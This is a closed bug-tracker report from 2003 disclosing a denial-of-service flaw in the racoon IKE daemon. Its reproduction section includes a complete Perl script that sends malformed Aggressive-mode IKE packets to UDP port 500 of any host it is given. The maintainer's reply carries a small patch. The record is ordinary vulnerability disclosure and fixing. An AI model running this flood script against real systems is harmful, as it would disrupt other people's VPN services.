- Confidential
-
no
- Severity
-
critical
- Priority
-
high
- Responsible
-
sakane@kame.net
- State
-
closed
- Class
-
sw-bug
- Submitter-Id
-
unknown
- Arrival-Date
-
Wed Dec 03 02:00:01 +0900 2003
- Closed-Date
-
Mon Mar 28 19:46:27 +0900 2005
- Last-Modified
-
Mon Mar 28 19:46:27 +0900 2005
- Originator
-
John Lampe jwlampe@nessus.org
- Release
-
racoon package version 20011215a
- Organization
-
Nessus
- Environment
-
FreeBSD f00dikator 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sun Nov 30 23:43:55 EST 2003 jwlampe@f00dikator:/usr/obj/usr/src/sys/JWL_IPSEC i386
- Description
-
While testing IKE/IPSEC implementations with the Nessus security scanner, I ran across this problem with racoon. We (Tenable Network Security) would like to include a vulnerability check for this bug in Nessus. Please advise when bug is corrected and where the new release may be found (jwlampe@nessus.org).
Within the IKE protocol, there is a special field reserved for "Security Association Next Payload" and another
field which is marked by the working group as 'RESERVED'. When a client uses the 'Agressive' key exchange mode
and inserts obviously bogus information into these fields (either separately or in tandem), the Racoon server
will instantly go into an infinite loop, drop all existing connections, and take up an inordinate amount of
system resources. The error displayed to console is (#82).
- How-To-Repeat
-
The following perl script will reproduce the errors named above.
#!/usr/bin/perl
use Socket;
$|=1;
$port = 500;
$host = shift || die "Need an IP";
$outer1 = "\xFF\x00\xFE\x01\xFD\x02\xFC\x03\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x04\x00\x00\x00\x00\x00\x00\x00\x01\x7B";
$outer2 =
"\x00\x80\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x74\x01\x01\x00\x01\x03\x00\x00\x24\x01\x01\x00\x00\x80\x01\x00\x05\x80
\x02\x00\x02\x80\x04\x00\x02\x80\x03\xFD\xE9\x80\x0B\x00\x01\x00\x0C\x00\x04\x00\x20\xC4\x9B\x03\x00\x00\x24\x02\x01\x00\x00\
x80\x01\x00\x05\x80\x02\x00\x02\x80\x04\x00\x02\x80\x03\xFD\xE9\x80\x0B\x00\x01\x00\x0C\x00\x04\x00\x20\xC4\x9B\x00\x00\x00\x
24\x03\x01\x00\x00\x80\x01\x00\x05\x80\x02\x00\x02\x80\x04\x00\x02\x80\x03\xFD\xE9\x80\x0B\x00\x01\x00\x0C\x00\x04\x00\x20\xC
4\x9B\x0A\x00\x00\x88\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19
\x1A\x1B\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2A\x2B\x2C\x2D\x2E\x2F\x30\x31\x32\x33\x34\x35\x36\x37\x38\
x39\x3A\x3B\x3C\x3D\x3E\x3F\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x
58\x59\x5A\x5B\x5C\x5D\x5E\x5F\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x7
7\x78\x79\x7A\x7B\x7C\x7D\x7E\x7F\x80\x81\x82\x83\xA4\x00\x00\x56\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E
\x0F\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1A\x1B\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2A\x2B\x2C\x2D\
x2E\x2F\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3A\x3B\x3C\x3D\x3E\x3F\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x
4D\x4E\x4F\x50\x51\x52";
$fuzzy1 = 4; # Security Association Next Payload
$fuzzy2 = 0; # RESERVED
for ($var1 = $fuzzy1; $var < 15; $var1++) {
for ($var2 = $fuzzy2; $var2 <= 128; $var2++) {
$req = $outer1 . $var1 . $var2 . $outer2;
blast_udp($req);
}
}
sub blast_udp {
my $msg = shift;
print ".";
$ip = inet_aton($host) or die "no host: $remote";
$paddr = sockaddr_in($port, $ip);
$proto = getprotobyname('udp');
socket(SOCK, PF_INET, SOCK_DGRAM, $proto) or die "socket: $!";
connect(SOCK, $paddr) or die "connect: $!";
send (SOCK, $msg, 0);
close (SOCK);
}
- Audit-Trail
-
From: Shoichi Sakane <sakane@kame.net>
To: jwlampe@nessus.org
Cc: kame-bugs@kame.net
Subject: Re: fbsd4/555: DoS vulnerability in Racoon
Date: Fri, 02 Apr 2004 16:58:49 +0900
> Wow, that was quick. Thanks. Any news on bug #fbsd4/555?
there was a problem in print-isakmp.c of tcpdump. i fixed it in the
repository. could you check if racoon does not crash if you can test
with the patch ?
===
Index: print-isakmp.c
===================================================================
RCS file: /cvsroot/kame/kame/kame/kame/tcpdump/print-isakmp.c,v
retrieving revision 1.17
retrieving revision 1.18
diff -r1.17 -r1.18
> if (ntohs(ext->len) > 0x1000 || ntohs(ext->len) == 0) {
> printf("invalid length=%ud", ntohs(ext->len));
> cp = ep + 1;
> break;
> }
State-Changed-From-To: open->feedback
State-Changed-By: sakane
State-Changed-When: Fri Apr 2 17:05:52 JST 2004
State-Changed-Why:
fixed the problem
Responsible-Changed-From-To: core->sakane
Responsible-Changed-By: sakane
Responsible-Changed-When: Fri Apr 2 17:05:52 JST 2004
Responsible-Changed-Why:
my responsibility
State-Changed-From-To: feedback->closed
State-Changed-By: suz
State-Changed-When: Mon Mar 28 19:46:01 JST 2005
State-Changed-Why:
the fix has been committed a long time ago, and the originator does not reply to it
- Unformatted
-
>Quarter:
>Keywords:
>Date-Required: